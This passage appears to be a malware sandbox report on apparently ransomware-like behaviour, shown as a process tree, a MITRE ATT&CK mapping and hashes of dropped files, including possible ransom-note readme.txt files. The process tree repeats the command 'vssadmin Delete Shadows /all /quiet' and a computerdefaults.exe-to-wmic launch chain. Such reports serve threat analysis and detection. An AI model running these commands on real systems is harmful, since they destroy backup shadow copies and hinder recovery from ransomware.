- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:928

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5748

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2404

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:6068
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5668
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5688

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5292
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6100
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5296

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5196

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5260
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1428
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6012

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5200
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5700
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5372

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1404

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2240

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5332

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5640

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4808

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5760
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6068
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4352

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:368
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3936
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5232

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1568

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5932

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3028

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:6128
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3800
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3952

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4680
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2156
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4664

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1392

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6088

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2108

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5768
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4848
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5828

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3880
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2596
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5792

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:720

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4dd2754d1bea40445984d65abee82b21

SHA1
4b6a5658bae9a784a370a115fbb4a12e92bd3390

SHA256
183b8e82a0deaa83d04736553671cedb738adc909f483b3c5f822a0e6be7477d

SHA512
92d44ee372ad33f892b921efa6cabc78e91025e89f05a22830763217826fa98d51d55711f85c8970ac58abf9adc6c85cc40878032cd6d2589ab226cd099f99e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ecf7ca53c80b5245e35839009d12f866

SHA1
a7af77cf31d410708ebd35a232a80bddfb0615bb

SHA256
882a513b71b26210ff251769b82b2c5d59a932f96d9ce606ca2fab6530a13687

SHA512
706722bd22ce27d854036b1b16e6a3cdb36284b66edc76238a79c2e11cee7d1307b121c898ad832eb1af73e4f08d991d64dc0bff529896ffb4ebe9b3dc381696

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
22599211a8d02ff621ed8a45c4a8f781

SHA1
3f8e7a4308e95fae9ecef300bb7b31a30a2cede8

SHA256
55a75cf28e974567949792fbe694b6baa2522a73d481e9d74ea3384877c35ad3

SHA512
6a8949433839166a8c680fe76b045389dca7dce94bc7bf434e6888d442609fb70f4529efb6df7e6bc0b5454e7bbd0c12ef4cc0ad6a84cfab2cd2c9d36f549d52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6f064e28a3b098330d80395892d87c42

SHA1
ebabd5ba4159d4d33d5aca7841998e2a07ad1461

SHA256
fbeb9954197de8c39af34da9016f4f8861554a72f7f5e70625c313cd4a592d25

SHA512
4f30235be0d8c26f905298741b25cb496df379121744e623fb4adc78fb449fbf3a9a3cb4cebb27d5cb8d7d093ad37bc4d8ae8406f1cfc19542326370a5991727

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
01c3d6e28f481506ce5456890407f6d9

SHA1
7631e0bbb47d081848afbdb124124cc78fd906b0

SHA256
f86f4b1e2082206b10a020d2c4317faec643b43005da3f7d9b04dc9bb202163f

SHA512
978639538c6378d23aa1c7808e7c541fd6b2a09c4e6f5f30c1fe277d903e1d0fdb7f47f9844f3e4e070a1789f3f358c9eba059fc454dc345ea632d424ac64e6a

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133725194290887239.txt

Filesize
76KB

MD5
6028830b38339b4af479bb61fa6391b5

SHA1
d6856c697b1045ba9a3f08d0c4342a490be3e2cd

SHA256
b6a3d4f07c6176fee6ff5b0d89e88788db2652d714c810b6896ce7a104175b32

SHA512
a3b4211353dd5fdafdcc19328d66c743574c0b84da5a13eb61c2c2045c7f2b8ceed3efe3f8d5ca5f789df9f41290d88bbe2e14364b70a7e7c5a487a73e5550a2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

Filesize
14KB

MD5
7a85c2df79b2c6395756bd56f2407cb9

SHA1
463747301e400255006618b739925fc2bde6d47c

SHA256
b0e7c0ecaba199f716ad94c34de6d592b1e5c7656da889c46b6dd9c09083f002

SHA512
d840881c5a2448f5a6ec2046d5e9d9a9971679086288a4d9493eae9d91271050d60460a63e41e00f8c9de84c0f8654bcf571dd6d20709bb8401993b12c9e269b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

Filesize
3KB

MD5
9195146b9aaa78a49e5a1d80bab3e263

SHA1
6d2b3cc856f0ccad7411a46b63d69f946809fc8d

SHA256
d4c68dac2bad4e37e810fea2486fb10d59f653c5602944ff9abce93cff3fff56

SHA512
f5dcbc5e6b90a4213994be2b5a6cb8a15422547e4cd80422042b52d169b51e486c2c5c26b739597bd42d1124035bf7af64e68ee02b149169cca4011574d2d089

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
8KB

MD5
f790231fbc99cd54e268b33cb96b2194

SHA1
7d4877dfc522c4c339f392f1d95b518bcf0468c0

SHA256
0554ec6c29e915a8a6251b0c318ef7104bca32c2756d9968f0131e1ce62dac98

SHA512
129c8b271819be02049b63f158025b94dca628aef7b3c4e321bb6368b48205c2658edb312ecf3a0db296e81508ea9d7999efd3ab818297c196379738acf57a4d

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
bf4fc4ac61c5e45a1ebb7d5b4be1240e

SHA1
4f93c90e4f8a5512d462d96ac8391ff5e1fcd4c5

SHA256
ad222957217de7f386b609a22943987a58d7b81615d13f0471054fe2973c0470

SHA512
68a6225a8494d1f87af028173559926deaefc48a800e137d0355891182c8a3fa1b89b5e17c65bc5f1b31a97bbcd450f4ba1b4890203a653cbf533237f01eb1b4

Download Submit
C:\Users\Public\readme.txt

Filesize
332B

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
memory/620-12-0x0000022CCE600000-0x0000022CCE605000-memory.dmp

Filesize
20KB

Download
memory/3016-1-0x0000020D5D2D0000-0x0000020D5D2D1000-memory.dmp

Filesize
4KB

Download
memory/3016-0-0x0000020D5CD00000-0x0000020D5D2D0000-memory.dmp

Filesize
5.8MB

Download
memory/3016-7-0x0000020D5D330000-0x0000020D5D331000-memory.dmp

Filesize
4KB

Download
memory/3016-8-0x0000020D5D370000-0x0000020D5D371000-memory.dmp

Filesize
4KB

Download
memory/3016-5-0x0000020D5D310000-0x0000020D5D311000-memory.dmp

Filesize
4KB

Download
memory/3016-2-0x0000020D5D2E0000-0x0000020D5D2E1000-memory.dmp

Filesize
4KB

Download
memory/3016-9-0x0000020D5D380000-0x0000020D5D381000-memory.dmp

Filesize
4KB

Download
memory/3016-6-0x0000020D5D320000-0x0000020D5D321000-memory.dmp

Filesize
4KB

Download
memory/3016-3-0x0000020D5D2F0000-0x0000020D5D2F1000-memory.dmp

Filesize
4KB

Download
memory/3016-10-0x0000020D5D3A0000-0x0000020D5D3A1000-memory.dmp

Filesize
4KB

Download
memory/3016-11-0x0000020D5D460000-0x0000020D5D461000-memory.dmp

Filesize
4KB

Download
memory/3016-4-0x0000020D5D300000-0x0000020D5D301000-memory.dmp

Filesize
4KB

Download
memory/3748-482-0x00000220147C0000-0x00000220147C8000-memory.dmp

Filesize
32KB

Download
memory/3748-483-0x0000022014780000-0x0000022014781000-memory.dmp

Filesize
4KB

Download